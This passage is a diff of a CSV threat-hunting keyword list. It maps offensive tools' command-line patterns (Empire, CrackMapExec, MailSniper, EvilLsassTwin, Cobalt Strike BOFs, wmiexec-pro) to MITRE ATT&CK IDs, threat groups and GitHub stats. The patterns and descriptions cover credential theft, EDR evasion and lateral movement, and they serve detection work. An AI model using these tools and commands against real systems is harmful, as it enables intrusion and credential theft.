 "* empire.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
-"* empire_exec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"* empireadmin*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* empire_exec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* empireadmin*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
 "* -enabled -u * -p * -old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"* -encrypt * -process * -sandbox *","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls.
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z"
+"* -encrypt * -process * -sandbox *","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z"
 "* enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"* enum 127.0.0.1 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"* enum 127.0.0.1 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
 "* enum -passive -d *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
-"* enum_avproducts*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"* enum_chrome*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"* enum_dns*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"* -Enumerate * -Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 -
Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"* --enum-local-admins*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"* enum_avproducts*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* enum_chrome*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* enum_dns*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* -Enumerate * -Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS.
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --enum-local-admins*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
 "* epmd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* eppc-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* EternalHushCore *","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
 "* etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "* EtwHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z"
-"* -eval *caplets.update*
ui.update*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"* -eval *caplets.update* ui.update*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
 "* EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z"
 "* evil.corp *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z"
 "* EvilClippyManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 -
T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"* evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-09-13T23:44:48Z","2022-09-07T02:47:43Z"
-"* EvilTwinServer *","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z"
-"* -ExchHostname * -Password *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email.
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
-"* --excludedcs*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z"
+"* evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z"
+"* EvilTwinServer *","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"* -ExchHostname * -Password *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email.
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"* --excludedcs*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
 "* exclusion.c /Fodefender.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
-"* -ExeArguments *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source.
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* exec * -p * -c *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"* exec * --pid * --command *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* -ExeArguments *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - 
CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* exec * -p * -c *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* exec * --pid * --command *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "* exec-command -clear*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* exec-command -command *","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation 
